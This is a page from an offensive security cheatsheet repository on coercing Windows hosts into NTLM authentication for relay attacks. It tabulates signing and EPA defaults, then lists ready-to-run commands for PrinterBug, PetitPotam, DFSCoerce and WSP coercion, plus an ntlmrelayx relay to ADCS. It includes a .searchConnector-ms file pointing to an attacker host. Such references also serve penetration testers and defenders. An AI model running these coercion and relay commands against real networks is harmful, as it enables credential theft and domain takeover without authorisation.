daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

internal-relay-coerce.md (7788B)


      1 ---
      2 title: "Internal - Coerce"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/internal-relay-coerce.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-relay-coerce.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Internal - Coerce
     12 
     13 Coerce refers to forcing a target machine (usually with SYSTEM privileges) to authenticate to another machine.
     14 
     15 ## Signing
     16 
     17 ### Server Side Signing
     18 
     19 | Operating System                | SMB Signing | LDAP Signing |
     20 | ------------------------------- | ----------- | ------------ |
     21 | Windows Server 2019 DC          | ✅          | ❌           |
     22 | Windows Server 2022 DC pre 23H2 | ✅          | ❌           |
     23 | Windows Server 2022 DC 23H2     | ✅          | ✅           |
     24 | Windows Server 2025 DC          | ✅          | ✅           |
     25 | Windows Server 2019 Member      | ❌          | -            |
     26 | Windows Server 2022 Member      | ❌          | -            |
     27 | Windows Server 2025 Member      | ❌          | -            |
     28 | Windows 10                      | ❌          | -            |
     29 | Windows 11 23H2                 | ❌          | -            |
     30 | Windows 11 24H2                 | ✅          | -            |
     31 
     32 * Server-side SMB signing has been enabled on domain controllers
     33 * Server-side SMB signing is still not required by default on non-DC Windows server
     34 
     35 ### EPA
     36 
     37 * [zyn3rgy/RelayInformer](https://github.com/zyn3rgy/RelayInformer) - Python and BOF utilites to the determine EPA enforcement levels of popular NTLM relay targets from the offensive perspective.
     38 
     39 ```ps1
     40 uv run relayinformer mssql --target 10.10.10.10 --user USER --password PASSWORD
     41 uv run relayinformer http --url http://10.10.10.10/page --user USER --password PASSWORD
     42 uv run relayinformer ldap --method BOTH --dc-ip 10.10.10.10 --user USER --password PASSWORD
     43 uv run relayinformer ldap --method LDAPS --dc-ip 10.10.10.10 --user USER --password PASSWORD
     44 ```
     45 
     46 | EPA Values                          | Description                                                                                                                                                                                                                                            |
     47 | ----------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
     48 | Disabled / Never                    | You should generally be able to target with NTLM relay, regardless of the client's support for EPA or version of NTLM being used.                                                                                                                      |
     49 | Allowed / Accepted / When Supported | You can theoretically conduct an NTLM relay but common relay scenarios will not work because standard coercion / poisoning techniques (mentioned above) will result in the addition of EPA-relevant AV pairs, indicating the client’s support for EPA. |
     50 | Required                            | NTLM relay should be prevented by validation of values provided in EPA-relevant AV pairs.                                                                                                                                                              |
     51 
     52 ## WebClient Service
     53 
     54 * On Windows workstations, the WebClient service is installed by default.
     55 * On Windows servers, it is not installed by default
     56 
     57 **Enable WebClient**:
     58 
     59 WebClient service can be enabled on the machine using several techniques:
     60 
     61 * Mapping a WebDav server using `net` command : `net use ...`
     62 * Typing anything into the explorer address bar that isn't a local file or directory
     63 * Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside.
     64 
     65     ```xml
     66     <?xml version="1.0" encoding="UTF-8"?>
     67     <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
     68         <description>Microsoft Outlook</description>
     69         <isSearchOnlyItem>false</isSearchOnlyItem>
     70         <includeInStartMenuScope>true</includeInStartMenuScope>
     71         <templateInfo>
     72             <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
     73         </templateInfo>
     74         <simpleLocation>
     75             <url>http://attacksystem/path</url>
     76         </simpleLocation>
     77     </searchConnectorDescription>
     78     ```
     79 
     80 Check if the WebDav service is running
     81 
     82 ```ps1
     83 nxc smb <ip> -u 'user' -p 'pass' -M webdav
     84 ```
     85 
     86 ## MS-RPRN - PrinterBug
     87 
     88 **Tools**:
     89 
     90 * [leechristensen/SpoolSample](https://github.com/leechristensen/SpoolSample) - PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface.
     91 
     92 **Examples**:
     93 
     94 ```ps1
     95 poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=PrinterBug
     96 ```
     97 
     98 Checking if the Spooler Service is running.
     99 
    100 ```ps1
    101 nxc smb <ip> -u 'user' -p 'pass' -M spooler
    102 ```
    103 
    104 ## MS-EFSR - PetitPotam
    105 
    106 The tools use the LSARPC named pipe with interface `c681d488-d850-11d0-8c52-00c04fd90f7e` because it's more prevalent. But it's possible to trigger with the EFSRPC named pipe and interface `df1941c5-fe89-4e79-bf10-463657acf44d`.
    107 
    108 **Tools**:
    109 
    110 * [topotam/PetitPotam](https://github.com/topotam/PetitPotam) - PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.
    111 
    112 **Examples**:
    113 
    114 ```ps1
    115 poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=PetitPotam
    116 ```
    117 
    118 ## MS-DFSNM - DFS Coercion
    119 
    120 DFS Coerce (MS-DFSNM abuse) is a technique to force a Windows system to authenticate to an attacker-controlled machine by abusing the DFS Namespace Management RPC interface.
    121 
    122 **Tools**:
    123 
    124 * [Wh04m1001/DFSCoerce](https://github.com/Wh04m1001/DFSCoerce) - PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot methods.
    125 
    126 **Examples**:
    127 
    128 ```ps1
    129 python3 dfscoerce.py -u username -d domain.local 10.10.10.10 10.10.10.11
    130 poetry run nxc smb 10.10.10.10/24 -u username -p password -M coerce_plus -o METHOD=DFSCoerce
    131 ```
    132 
    133 ## MS-WSP - WSP Coercion
    134 
    135 * The `wsearch` service is only enabled by default on workstations, and has been disabled on servers since Server 2016.
    136 * Only SMB connections can be coerced with WSP.
    137 
    138 **Tools**:
    139 
    140 * [slemire/WSPCoerce](https://github.com/slemire/WSPCoerce) - PoC to coerce authentication from Windows hosts using MS-WSP.
    141 * [RedTeamPentesting/wspcoerce](https://github.com/RedTeamPentesting/wspcoerce) - wspcoerce coerces a Windows computer account via SMB to an arbitrary target using MS-WSP.
    142 
    143 **Examples**:
    144 
    145 ```ps1
    146 WSPCoerce.exe <target> <listener>
    147 WSPCoerce.exe labsw1 172.23.10.109
    148 WSPCoerce.exe labsw1 labsrv1
    149 
    150 wspcoerce 'lab.redteam/rtpttest:test1234!@192.0.2.115' "file:////attacksystem/share"
    151 ntlmrelayx.py -t "http://192.0.2.5/certsrv/" -debug -6 -smb2support --adcs
    152 ```
    153 
    154 * Can't use an IP address for the target, use a short hostname only (no FQDN)
    155 * Make sure to use a hostname or FQDN for the listener if you want to receive Kerberos auth
    156 
    157 ## References
    158 
    159 * [Changes to SMB Signing Enforcement Defaults in Windows 24H2 - Michael Grafnetter - January 26, 2025](https://www.dsinternals.com/en/smb-signing-windows-server-2025-client-11-24h2-defaults/)
    160 * [Less Praying More Relaying – Enumerating EPA Enforcement for MSSQL and HTTPS - Nick Powers, Matt Creel - November 25, 2025](https://specterops.io/blog/2025/11/25/less-praying-more-relaying-enumerating-epa-enforcement-for-mssql-and-https/)
    161 * [The Ultimate Guide to Windows Coercion Techniques in 2025 - RedTeam Pentesting - June 4, 2025](https://blog.redteam-pentesting.de/2025/windows-coercion/)